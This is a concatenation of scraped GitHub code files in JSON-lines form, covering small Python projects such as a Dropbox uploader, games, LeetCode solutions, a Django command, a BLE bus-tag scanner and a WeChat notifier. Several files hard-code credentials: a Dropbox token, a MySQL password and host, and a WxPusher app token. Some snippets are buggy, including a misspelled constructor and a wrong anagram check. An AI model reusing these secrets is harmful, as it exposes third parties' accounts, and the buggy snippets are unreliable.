mask_pred\n occ[mask] &= (d_hat >= d_gt)[mask]\n #p_out = torch.cat(p_out + p_out2)\n \n p_out = p_out[occ == 1]\n p_out = torch.cat([p_out, torch.cat(p_out2)],)\n n_p = (occ == 1).sum()\n p_uni = (torch.rand(n_p, 3) - 0.5) * 1.1\n mask_outside = torch.any((p_uni < bmin.reshape(1, 3)) | (p_uni > bmax.reshape(1, 3)), dim=-1)\n \n p_out = torch.cat([p_out, p_uni[mask_outside]]).numpy()\n occ = torch.zeros(p_out.shape[0])\n occ[:n_p] = 1.\n occ = occ.bool().numpy()\n \n out_file = join(scene_path, 'points_adv.npz')\n out_file2 = join(scene_path, 'points2_adv.ply')\n trimesh.Trimesh(vertices=p_out[occ==1], process=False).export(out_file2)\n out_dict = {\n 'points': p_out.astype(np.float16),\n 'occupancies': np.packbits(occ),\n }\n np.savez(out_file, **out_dict)\n","repo_name":"daniil-777/dynamic_geo_convolutional_onet","sub_path":"src/point_plane_net/conv_onet/scripts/dataset_scannet_depth/generate_iou_points_advanced.py","file_name":"generate_iou_points_advanced.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23888000797","text":"import dropbox\r\n\r\nclass TransferData:\r\n def _init_(self,access_token):\r\n self.access_token=access_token\r\n\r\n def upolad_file(self,file_from,file_to):\r\n dbx=dropbox.Dropbox(self.access_token)\r\n\r\n\r\n f= open(file_from,'rb')\r\n dbx.files_upload(f.read(),file_to)\r\n\r\ndef main():\r\n access_token='sl.AhrpewlqHh79dOJ4bywfbhdzbHToDV0W9LvGduYAFZhQ7Cbvmyvo06cT9OhnnWWCsrwLlavJ_55NuAh25BJZnvh3jB2Ld6f79rwe46SXVpup0H50nZ748lErQs6x2gIENlqIAKU'\r\n transferData=TransferData(access_token)\r\n\r\n file_from = input(\"Enter the file path to transfer :-\")\r\n file_to = input(\"enter the full path to dropbox :-\") #this is the full path to upload the file to,including name as you wish the file to be called once upload\r\n\r\n #API v2\r\n transferData.upload_file(file_from,file_to)\r\n print(\"file has been moved!!!!\")\r\n\r\n\r\n main() ","repo_name":"h510-cell/fantastic-chainsaw","sub_path":"Upload File.py","file_name":"Upload File.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38330853050","text":"import random\n\nwhile True:\n user_action = input(\"Kirjuta valiku (kivi, paber, käärid): \")\n possible_actions = [\"kivi\", \"paber\", \"käärid\"]\n computer_action = random.choice(possible_actions)\n print(f\"\\nSa valisid {user_action}, arvuti valis {computer_action}.\\n\")\n\n if user_action == computer_action:\n print(f\"Kaks mängijad valisid {user_action}. see on viik!\")\n elif user_action == \"kivi\":\n if computer_action == \"käärid\":\n print(\"Kivi lõi käärid! Saa võitsid!\")\n else:\n print(\"Paber sõi kivi! Saa kaotasid.\")\n elif user_action == \"paber\":\n if computer_action == \"kivi\":\n print(\"Paber sõi kivi! Saa võitsid!\")\n else:\n print(\"Käärid lõikasid paberi! Saa kaotasid.\")\n elif user_action == \"käärid\":\n if computer_action == \"paber\":\n print(\"Käärid lõikasid paberi! Saa võitsid!\")\n else:\n print(\"Kivi lõi käärid! Saa kaotasid.\")\n\n play_again = input(\"Mängid jälle? 
(j/e): \")\n if play_again.lower() != \"j\":\n break","repo_name":"KevinJasin/python","sub_path":"yl22.py","file_name":"yl22.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42211468497","text":"import numpy as np\n\nfrom tensorforce import Environment, Runner\n\n\nclass MultiactorEnvironment(Environment):\n \"\"\"\n Example multi-actor environment, illustrating best-practice implementation pattern.\n\n State space: position in [0, 10].\n Action space: movement in {-1, 0, 1}.\n Random start in [3, 7].\n Actor 1 perspective as is, actor 2 perspective mirrored.\n Positive reward for being closer to 10.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def states(self):\n return dict(type='int', num_values=11)\n\n def actions(self):\n return dict(type='int', num_values=3)\n\n def num_actors(self):\n return 2 # Indicates that environment has multiple actors\n\n def reset(self):\n # Always for multi-actor environments: initialize parallel indices\n self._parallel_indices = np.arange(self.num_actors())\n\n # Single shared environment logic, plus per-actor perspective\n self._states = 3 + np.random.randint(5)\n self.second_actor = True\n states = np.stack([self._states, 10 - self._states], axis=0)\n\n # Always for multi-actor environments: return per-actor values\n return self._parallel_indices.copy(), states\n\n def execute(self, actions):\n # Single shared environment logic, plus per-actor perspective\n if self.second_actor:\n self.second_actor = self.second_actor and not (np.random.random_sample() < 0.1)\n terminal = np.stack([False, not self.second_actor], axis=0)\n delta = (actions[0] - 1) - (actions[1] - 1)\n self._states = np.clip(self._states + delta, a_min=0, a_max=10)\n states = np.stack([self._states, 10 - self._states], axis=0)\n else:\n terminal = np.stack([False], axis=0)\n delta = (actions[0] - 1)\n self._states = np.clip(self._states + delta, a_min=0, a_max=10)\n states = np.stack([self._states], axis=0)\n reward = (states - 5.0) / 5.0\n\n # Always for multi-actor environments: update parallel indices, and return per-actor values\n self._parallel_indices = self._parallel_indices[~terminal]\n return self._parallel_indices.copy(), states, terminal, reward\n\n\ndef main():\n # Multi-actor runner, automatically if environment.num_actors() > 1\n runner = Runner(\n agent='benchmarks/configs/ppo.json',\n environment=MultiactorEnvironment,\n max_episode_timesteps=10\n )\n runner.run(num_episodes=1000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tensorforce/tensorforce","sub_path":"examples/multiactor_environment.py","file_name":"multiactor_environment.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":3258,"dataset":"github-code","pt":"75"} +{"seq_id":"29373236291","text":"documents = [\n {\"type\": \"passport\", \"number\": \"2207 876234\", \"name\": \"Василий Гупкин\"},\n {\"type\": \"invoice\", \"number\": \"11-2\", \"name\": \"Геннадий Покемонов\"},\n {\"type\": \"insurance\", \"number\": \"10006\", \"name\": \"Аристарх Павлов\"}\n]\n\ndirectories = {\n '1': ['2207 876234', '11-2'],\n '2': ['10006'],\n '3': []\n }\n\n\ndef people(n_of_document):\n for i, element in enumerate(documents):\n if n_of_document in element.values():\n return element['name']\n return 'Cannot find document'\n\n\ndef print_list():\n for i, element in enumerate(documents):\n print('{} \"{}\" \"{}\"'.format(element['type'], 
element['number'], element['name']))\n\n\ndef print_dir():\n print(directories)\n\n\ndef get_key(d, value):\n for k, v in d.items():\n if v == value:\n return k\n\n\ndef find_shelf(n_of_document):\n for element in directories.values():\n if n_of_document in element:\n return get_key(directories, element)\n return 'Cannot find document'\n\n\ndef add_person(document_number, type_document, name_owner, shelf_number):\n documents.append({'type': type_document, 'number': document_number, 'name': name_owner})\n if shelf_number in directories.keys():\n directories[shelf_number].append(document_number)\n else:\n directories[shelf_number] = []\n directories[shelf_number].append(document_number)\n\n\nwhile True:\n com = input('\\nEnter command: \\np - search person by number of document\\nl - list\\nls - list shelves\\ns - shelf\\na - add\\nq - exit\\n')\n if com == 'p':\n document_number = input('Enter document number: ')\n print(people(document_number))\n elif com == 'l':\n print_list()\n elif com == 'ls':\n print_dir()\n elif com == 's':\n document_number = input('Enter document number: ')\n print('Document on the shelf with number - {}'.format(find_shelf(document_number)))\n elif com == 'a':\n document_number = input('Enter document number: ')\n type_document = input('Enter type of document: ')\n name_owner = input('Enter name of owner: ')\n shelf_number = input('Enter shelf number: ')\n add_person(document_number, type_document, name_owner, shelf_number)\n print('Person added')\n elif com == 'q':\n print('Exit program...')\n break\n else:\n print('Unaviable command!')\n","repo_name":"dzendjo/HomeworkPythonNetology","sub_path":"DZ_Python_def/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13749008823","text":"# Given two strings s and t, return true if t is an anagram of s, and false otherwise.\n# An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase,\n# typically using all the original letters exactly once.\n#\n# Example 1:\n#\n# Input: s = \"anagram\", t = \"nagaram\"\n# Output: true\n# Example 2:\n#\n# Input: s = \"rat\", t = \"car\"\n# Output: false\n#\n# Constraints:\n# 1 <= s.length, t.length <= 5 * 104\n# s and t consist of lowercase English letters.\n# Follow up: What if the inputs contain Unicode characters? 
How would you adapt your solution to such a case?\n# Solution\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return s == t\n\n# Solution 1 - One HashTable O(N) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n d = {}\n for i in s:\n d[i] = d.get(i, 0) + 1\n for i in t:\n d[i] = d.get(i, 0) - 1\n for i in d:\n if d[i] != 0:\n return False\n return True\n# Solution 2 - Two HashTable O(N) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n d1, d2 = {}, {}\n for i in s:\n if i not in d1:\n d1[i] = 1\n else:\n d1[i] += 1\n for i in t:\n if i not in d2:\n d2[i] = 1\n else:\n d2[i] += 1\n return d1 == d2\n# Solution 3 - Similar Sorting O(N log(N)) O(N)\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(s) == sorted(t)\n# Solution 4 - One Liner O(N**2) O(N)\nclass Solution(object):\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n return all(s.count(i) == t.count(i) for i in t)","repo_name":"kaluginpeter/Algorithms_and_structures_tasks","sub_path":"Python_Solutions/LeetCode/Easy/242._Valid_Anagram.py","file_name":"242._Valid_Anagram.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"2886589839","text":"# ============================================\n# Title: Exercise 9.2\n# Author: Professor Krasso\n# Date: 9 May 2022\n# Modified By: Joel Hartung\n# Description: hartung-user-service.py\n# Code Attribution: Code from the Exercise 9.2 document\n# ============================================\n\n\n# import statements\nfrom pymongo import MongoClient\nimport pprint\nimport datetime\n\n# connect to local MongoDB instance\nclient = MongoClient('localhost', 27017)\ndb = client.web335\n\n# create a new user document\nuser = {\n \"first_name\": \"Jean-Claude\",\n \"last_name\": \"Van Damme\",\n \"email\": \"jcvd@mail.com\",\n \"employee_id\": \"00000001\",\n \"date_created\": datetime.datetime.utcnow()\n}\n\n# insert new user document\nuser_id = db.users.insert_one(user).inserted_id\n\n# output auto-generated user_id\nprint(user_id)\n\n# query users collection using \"find_one()\" method & print returned document\npprint.pprint(db.users.find_one({\"employee_id\": \"00000001\"}))\n","repo_name":"jhartung/web-335","sub_path":"week-9/hartung-user-service.py","file_name":"hartung-user-service.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38991159285","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n self.res = []\n def findBst(node, target):\n if not node:\n return\n if node.val == target:\n self.res.append(node)\n return\n elif node.val > target:\n self.res.append(node)\n findBst(node.left, target)\n else:\n self.res.append(node)\n findBst(node.right, target)\n findBst(root, q.val)\n arr = self.res\n self.res = []\n findBst(root, p.val)\n x, y = len(arr), len(self.res)\n for i in range(min(x, y)):\n if arr[i].val != self.res[i].val:\n break\n abss = arr[i]\n return 
abss","repo_name":"amanz55/a2sv_competitiveprogramming","sub_path":"235-lowest-common-ancestor-of-a-binary-search-tree/235-lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"235-lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20346836381","text":"from typing import Optional, Union\n\nimport database\nfrom utils import language\nfrom . import local, online\nfrom .entry import ChineseDictEntry, EnglishDictEntry\n\n\nclass Dictionary:\n def __init__(self, local_only=False, db_feedback=True):\n self.local_only = local_only\n self.db_feedback = db_feedback\n self.database = database.get_default_database()\n\n def query_english_word(self, word: str) -> Optional[EnglishDictEntry]:\n entry = local.query_english_word(word)\n if entry is not None or self.local_only:\n return entry\n\n entry = online.query_english_word(word)\n if entry is None:\n return None\n\n return entry\n\n def query_chinese_word(self, word: str) -> Optional[ChineseDictEntry]:\n entry = local.query_chinese_word(word)\n if entry is not None or self.local_only:\n return entry\n\n entry = online.query_chinese_word(word)\n if entry is None:\n return None\n\n return entry\n\n def query_word(self, word: str) -> Optional[Union[ChineseDictEntry, EnglishDictEntry]]:\n if language.get_language(word) == language.Lang.CHINESE:\n entry = self.query_chinese_word(word)\n if entry is not None and self.db_feedback:\n self.database.insert_chinese_entry(entry)\n elif language.get_language(word) == language.Lang.ENGLISH:\n entry = self.query_english_word(word)\n if entry is not None and self.db_feedback:\n self.database.insert_english_entry(entry)\n\n return entry\n","repo_name":"Kienyew/Skimmed-Wudao","sub_path":"src/dictionary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30850683970","text":"from collections import defaultdict\n\n\nclass MetadataMixin(object):\n \"\"\"\n This mixin adds metadata functionality to the standard error bundle.\n Including this in the error bundle allows the app to collect and process\n metadata during the validation process.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n self.resources = {}\n self.pushable_resources = {}\n self.final_context = None\n\n self.metadata = {}\n\n self.feature_profile = set()\n self.feature_usage = defaultdict(list)\n\n super(MetadataMixin, self).__init__(*args, **kwargs)\n\n def get_resource(self, name):\n \"\"\"Retrieve an object that has been stored by another test.\"\"\"\n\n if name in self.resources:\n return self.resources[name]\n elif name in self.pushable_resources:\n return self.pushable_resources[name]\n else:\n return False\n\n def get_or_create(self, name, default, pushable=False):\n \"\"\"Retrieve an object that has been stored by another test, or create\n it if it does not exist.\n\n \"\"\"\n\n if name in self.resources:\n return self.resources[name]\n if name in self.pushable_resources:\n return self.pushable_resources[name]\n else:\n return self.save_resource(name, default, pushable=pushable)\n\n def save_resource(self, name, resource, pushable=False):\n \"\"\"Save an object such that it can be used by other tests.\"\"\"\n\n if pushable:\n self.pushable_resources[name] = resource\n else:\n self.resources[name] = resource\n\n return resource\n\n def 
_extend_json(self):\n \"\"\"Output the metadata as part of the main JSON blob.\"\"\"\n extension = super(MetadataMixin, self)._extend_json() or {}\n extension.update(metadata=self.metadata,\n feature_profile=list(self.feature_profile),\n feature_usage=dict(self.feature_usage))\n return extension\n","repo_name":"wanmmyjs/app-validator","sub_path":"appvalidator/errorbundle/metadatamixin.py","file_name":"metadatamixin.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"28683232462","text":"import logging\n\nfrom django.core.management import BaseCommand\n\nfrom posts.models.post import Post\nfrom tags.models import Tag, UserTag\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = \"Join two tags into the first one (migrating all posts and users)\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"--first\", type=str, required=True)\n parser.add_argument(\"--second\", type=str, required=True)\n\n def handle(self, *args, **options):\n first_tag_code = options[\"first\"]\n second_tag_code = options[\"second\"]\n\n first_tag = Tag.objects.filter(code=first_tag_code).first()\n if not first_tag:\n self.stdout.write(f\"Tag '{first_tag}' does not exist\")\n return\n\n second_tag = Tag.objects.filter(code=second_tag_code).first()\n if not second_tag:\n self.stdout.write(f\"Tag '{second_tag_code}' does not exist\")\n return\n\n Post.objects.filter(collectible_tag_code=second_tag.code).update(collectible_tag_code=first_tag.code)\n for user_tag in UserTag.objects.filter(tag=second_tag):\n try:\n user_tag.tag = first_tag\n user_tag.save()\n except Exception as ex:\n self.stdout.write(f\"UserTag '{user_tag.user_id}' is duplicate. Skipped. 
{ex}\")\n\n Tag.objects.filter(code=second_tag.code).delete()\n\n self.stdout.write(\"Done 🥙\")\n","repo_name":"vas3k/vas3k.club","sub_path":"tags/management/commands/join_tags.py","file_name":"join_tags.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":685,"dataset":"github-code","pt":"75"} +{"seq_id":"5463246759","text":"##This program demonstrates random numbers using a rock, paper, scissors game.\r\n\r\n#imports\r\nfrom random import randint\r\n\r\n#declare win counters\r\nuWins = 0\r\ncWins = 0\r\nties = 0 \r\n\r\n#print game instructions\r\nprint(\"Rock, Paper, Scissors!\\n1 = Rock\\n2 = Paper\\n3 = Scissors\\n\")\r\n\r\n\r\n##This function calculates the winner of rock, paper, scissors\r\ndef winner(u, c):\r\n winner = 0\r\n if(u == c):\r\n print(\"It's a tie!\")\r\n winner = 0\r\n elif(u == 1 and c == 2):\r\n print(\"Paper wraps rock, computer wins!\")\r\n winner = 2\r\n elif(u == 2 and c == 1):\r\n print(\"Paper wraps rock, user wins!\")\r\n winner = 1\r\n elif(u == 1 and c == 3):\r\n print(\"Rock smashes scissors, user wins!\")\r\n winner = 1\r\n elif(u == 3 and c == 1):\r\n print(\"Rock smashes scissors, computer wins!\")\r\n winner = 2\r\n elif(u == 2 and c == 3):\r\n print(\"Scissors cut paper, computer wins!\")\r\n winner = 2\r\n elif(u == 3 and c == 2):\r\n print(\"Scissors cut paper, user wins!\")\r\n winner = 1\r\n return winner\r\n \r\n\r\n#gameplay\r\nagain = 'y'\r\nwhile(again.lower() == 'y'):\r\n #get choices\r\n userChoice = int(input(\"Enter your choice: \"))\r\n compChoice = randint(1, 3)\r\n\r\n #calulate wins\r\n result = winner(userChoice, compChoice)\r\n if(result == 0): ties += 1\r\n elif(result == 1): uWins += 1\r\n elif(result == 2): cWins += 1\r\n\r\n #print scoreboard\r\n print(\"Ties: \" + str(ties))\r\n print(\"User wins: \" + str(uWins))\r\n print(\"Computer wins: \" + str(cWins))\r\n\r\n #ask if continue\r\n again = str(input(\"\\nPlay again? 
(y/n) \"))\r\n\r\nprint(\"Bye!\")\r\n \r\n \r\n","repo_name":"ari789/rock-paper-scissors","sub_path":"RockPaperScissors.py","file_name":"RockPaperScissors.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2882156719","text":"'''\nCreated on Jan 24, 2018\n\n@author: shifa\n'''\n#nested loops\n#can use one or more loops inside any\n#while or for loops\n\n#can put any type of loop inside any\n#other type of loop \n\n#nested for loop to display multiplication\n#tables from 1-10\n\n#import sys\n\nfor i in range(1,11):\n for j in range(1,11):\n k = i * j\n print(k, end =' ')\n print()\n\n\n#print(list(range(1,11))) \n#prints 1-10\n\n#end=' ' appends a space instead of \n#default new line\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shifalik/practice","sub_path":"shifali/test30.py","file_name":"test30.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69984018804","text":"from dash import Dash, html, dcc\nimport dash\n\napp = Dash(__name__, use_pages=True)\n\napp.layout = html.Div([\n\thtml.H1('Cell Imaging Analysis Pipeline'),\n\n html.Div(\n [\n html.Div(\n dcc.Link(\n f\"{page['name']}\", href=page[\"relative_path\"]\n )\n )\n for page in dash.page_registry.values()\n ]\n ),\n\n\tdash.page_container\n])\n\nif __name__ == '__main__':\n\tapp.run_server(debug=True)","repo_name":"nmra-abarthmaron/cell-imaging","sub_path":"gui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21082075253","text":"from math import *\r\nimport sympy as sp \r\nimport matplotlib as mat\r\n\r\nx,y=sp.symbols('x y')\r\n# str_ecuacion = input(\"Ingrese la ecuacion: \\n\")\r\n# funcion= sp.sympify(str_ecuacion)\r\n\r\n\r\n\r\n\r\ndef f(x): \r\n b= funcion.free_symbols\r\n var=b.pop()\r\n valor = funcion.evalf(subs={var:x})\r\n\r\n return valor\r\n\r\ndef Derivada(x):\r\n\r\n h=0.0001 \r\n\r\n uno=float((f(x+h)-f(x))/h)\r\n #dos=float((f(x+h)-2*f(x)+f(x-h))/h**2)\r\n\r\n return uno\r\n # print(\"valor segunda derivada\",dos)\r\n\r\ndef newton_raphson(x,E,I):\r\n I+=1\r\n MT=float(Derivada(x))#penidente de la recta tangente de la funcion \r\n Xr=x-(f(x)/MT) #Intercepto en el eje X\r\n global Error\r\n Error = float(f(Xr))\r\n V=[Xr,I,Error]\r\n if(I>50):\r\n return [\"NO ENCONTRADO\",I]\r\n else:\r\n if(f(Xr)>=0):\r\n if(f(Xr)<=E):\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return V\r\n else:\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return newton_raphson(Xr,E,I)\r\n else:\r\n if(-f(Xr)<=E):\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return V\r\n else:\r\n print('{:^10}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}{:^10.6f}'.format(I, float(x),float(f(x)),MT,float(Xr),float(f(Xr))))\r\n return newton_raphson(Xr,E,I) \r\n\r\n\r\n\r\n\r\ndef Menu(f,valor,e):\r\n global funcion\r\n x,y=sp.symbols('x y')\r\n funcion=sp.sympify(f)\r\n Opcion=valor\r\n ll = Opcion.replace(\"pi\",str(pi))\r\n opcion = float (sp.sympify(ll))\r\n \r\n Er=float(e)\r\n iteraciones=0\r\n # 
print('{:^10}{:^10}{:^10}{:^10}{:^10}{:^10}'.format(\"I\",\"X1\",\"f(Xi)\",\"f'(Xi)\",\"X2\",\"Error\"))\r\n\r\n Z=newton_raphson(opcion,Er,iteraciones)\r\n # z=Z[0]\r\n # y=Z[1]\r\n \r\n # print(\"La intercepcion en el eje X es: \",z,\"a las \",y,\" iteraciones\")\r\n return Z\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n# Menu()","repo_name":"Orozquiano/computacionGrafica","sub_path":"newton_raphson.py","file_name":"newton_raphson.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70525660723","text":"#coding=utf-8\n\"\"\"\n@Author : Yuan Meng\n@Time : 2023/2/23 19:13\n@Software: PyCharm\nCtrl+shift+v 历史粘贴版\nctrl+alt+空格 自动补全\nctrl+alt+D 分屏\nCtrl+/ 快速注释\n\n\"\"\"\nimport re\nimport urllib.request\n\nfrom PIL import Image\nfrom aip import AipOcr\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\nfrom email.mime.text import MIMEText\nimport json,time,smtplib\nimport urllib.parse\nfrom threading import Lock, Thread\nimport requests\nimport sys\nimport traceback\nfrom datetime import datetime\n\nglobal wechat_lock\nwechat_lock = Lock()\n\n# 这里可以设置UIDS, 多个人可同时接收 [袁猛,李良,蔡姻,张斯杰,罗柳,王凯]\n# UIDS = ['UID_j0EdePPCONxX3OszmdyvwSYknX8m','UID_7zDNlQLoP6BwAJFJ6dRCuy9EQ1fp','UID_dxNzj6aupA6Q4QZrDkwmCcDLMX2e','UID_nSMBON6ECkBvdpOC3QeUfIUb7tJX','UID_pyB3i43mzt2LctecgCBZWBz035GZ','UID_IJVLOOwS4AtmaaydQzjBPoQUeBw0']\nUIDS = ['UID_j0EdePPCONxX3OszmdyvwSYknX8m']\n\nAPP_TOKEN = 'AT_wW7eEobXR61htcs4zw6HIchK1yUaSx8L'\n# AT_zueTbAm3qrDJy2BvWtYwJwqVgRjGZIhF\n\nclass wechat_thread(Thread):\n \"\"\"\n 采用线程方式,不阻塞\n \"\"\"\n\n def __init__(self, uids: list, content: str, topic_ids: list = [], url: str = '', app_token=''):\n\n # text:消息标题,最长为256,必填。\n # desp:消息内容,最长64Kb,可空,支持MarkDown。\n\n super(wechat_thread, self).__init__(name=\"wechat_thread\")\n self.request_url = \"http://wxpusher.zjiecode.com/api/send/message\"\n self.uids = uids\n self.content = content\n self.topic_ids = topic_ids\n self.url = url\n self.lock = wechat_lock\n self.app_token = app_token if len(app_token) > 0 else APP_TOKEN\n\n def run(self):\n if self.content is None or len(self.content) == 0:\n return\n params = {}\n params['appToken'] = self.app_token\n params['content'] = self.content\n params['contentType'] = 1\n params['topicIds'] = self.topic_ids\n params['uids'] = self.uids\n params['url'] = self.url\n\n # 发送请求\n try:\n response = requests.post(self.request_url, json=params).json()\n if not response.get('success', False):\n print(response)\n except Exception as e:\n print(\"{} wechat_thread sent failed! 
ex:{},trace:{}\".format(datetime.now(), str(e), traceback.format_exc()),\n file=sys.stderr)\n return\n\n print(\"未打卡人员微信通知成功!\")\n\ndef send_wx_msg(*args, **kwargs):\n \"\"\"\n 发送微信Msg\n :param content: 发送内容\n :return:\n \"\"\"\n content = kwargs.get('content', None)\n if content is None:\n if len(args) == 0:\n return\n content = args[0]\n if len(content) == 0:\n return\n\n\n if not isinstance(content, str):\n if isinstance(content, dict):\n content = '{}'.format(print(content))\n else:\n content = str(content)\n\n uids = kwargs.get('uids', [])\n # 没有配置的话,使用缺省UID\n if len(uids) == 0:\n uids.extend(UIDS)\n\n app_token = kwargs.get('app_token')\n\n t = wechat_thread(uids=UIDS, content=content, app_token=APP_TOKEN)\n t.daemon = False\n t.start()\n\ntext = '通知:'\nsend_wx_msg(text)","repo_name":"yuan1093040152/SeleniumTest","sub_path":"python3Test/Test/test012.py","file_name":"test012.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27394623001","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\nimport binascii\nimport os\nimport sys\nimport time\nimport datetime\nimport pyshark\nimport subprocess\nimport MySQLdb\nfrom bluepy import btle\n\n\nif os.getenv('C', '1') == '0':\n ANSI_RED = ''\n ANSI_GREEN = ''\n ANSI_YELLOW = ''\n ANSI_CYAN = ''\n ANSI_WHITE = ''\n ANSI_OFF = ''\nelse:\n ANSI_CSI = \"\\033[\"\n ANSI_RED = ANSI_CSI + '31m'\n ANSI_GREEN = ANSI_CSI + '32m'\n ANSI_YELLOW = ANSI_CSI + '33m'\n ANSI_CYAN = ANSI_CSI + '36m'\n ANSI_WHITE = ANSI_CSI + '37m'\n ANSI_OFF = ANSI_CSI + '0m'\n\nclass ScanPrint(btle.DefaultDelegate):\n\n def __init__(self, opts):\n btle.DefaultDelegate.__init__(self)\n self.opts = opts\n\n def handleDiscovery(self, dev, isNewDev, isNewData):\n if dev.getValueText(9) is not None:\n if 'TAG' in dev.getValueText(9):\n if isNewDev:\n status = \"new\"\n elif isNewData:\n if self.opts.new:\n return\n status = \"update\"\n else:\n if not self.opts.all:\n return\n status = \"old\"\n\n if dev.rssi < self.opts.sensitivity:\n return\n\n print(datetime.datetime.now().strftime(\"%A, %d %B %Y %I:%M%p\") + ' | Device : %s (%s), %d dBm' %\n (ANSI_WHITE + dev.addr + ANSI_OFF,\n dev.getValueText(9),\n dev.rssi))\n if not dev.scanData:\n print('\\t(no data)')\n print\n else:\n return\n\n\ndef connect(devices):\n print(ANSI_YELLOW + \"Connecting to Devices...\" + ANSI_OFF)\n\n for d in devices:\n if d.getValueText(9) == 'iTAG':\n if d.connectable:\n print(\" Connecting to\", ANSI_WHITE + d.addr + ANSI_OFF + \":\")\n dev = btle.Peripheral(d)\n time.sleep(1)\n dev.disconnect()\n time.sleep(2)\n\n\ndef scan():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i', '--hci', action='store', type=int, default=0,\n help='Interface number for scan')\n parser.add_argument('-t', '--timeout', action='store', type=int, default=60,\n help='Scan delay, 0 for continuous')\n parser.add_argument('-s', '--sensitivity', action='store', type=int, default=-128,\n help='dBm value for filtering far devices')\n parser.add_argument('-d', '--discover', action='store_true',\n help='Connect and discover service to scanned devices')\n parser.add_argument('-a', '--all', action='store_true',\n help='Display duplicate adv responses, by default show new + updated')\n parser.add_argument('-n', '--new', action='store_true',\n help='Display only new adv responses, by default show new + updated')\n parser.add_argument('-v', '--verbose', action='store_true',\n 
help='Increase output verbosity')\n arg = parser.parse_args(sys.argv[1:])\n\n btle.Debugging = arg.verbose\n\n #get Raspberry Pi Mac Address\n bus_rpi_mac = subprocess.check_output(\n [\"cat\", \"/sys/class/bluetooth/hci0/address\"])\n bus_rpi_mac = bus_rpi_mac[:-1]\n\n #connect to Mysql Database\n db = MySQLdb.connect(host=\"52.77.27.5\",\n port=12345,\n user=\"schoolbus\",\n passwd=\"password4schoolbus\",\n db=\"schoolbus\")\n cursor = db.cursor()\n\n while True:\n\n print(\"\\n\" + ANSI_RED + \"Scanning for devices...\" + ANSI_OFF)\n scanner = btle.Scanner(arg.hci).withDelegate(ScanPrint(arg))\n devices = scanner.scan(arg.timeout)\n\n itag_amount = 0\n\n for d in devices:\n if d.getValueText(9) is not None:\n if 'TAG' in d.getValueText(9):\n itag_amount += 1\n cursor.execute(\"INSERT INTO school_bus_scan_data (rpi_mac, itag_mac,time, rssi) VALUES (%s,%s,%s,%s)\", (\n bus_rpi_mac, d.addr, datetime.datetime.now(), d.rssi))\n print('insert complete')\n 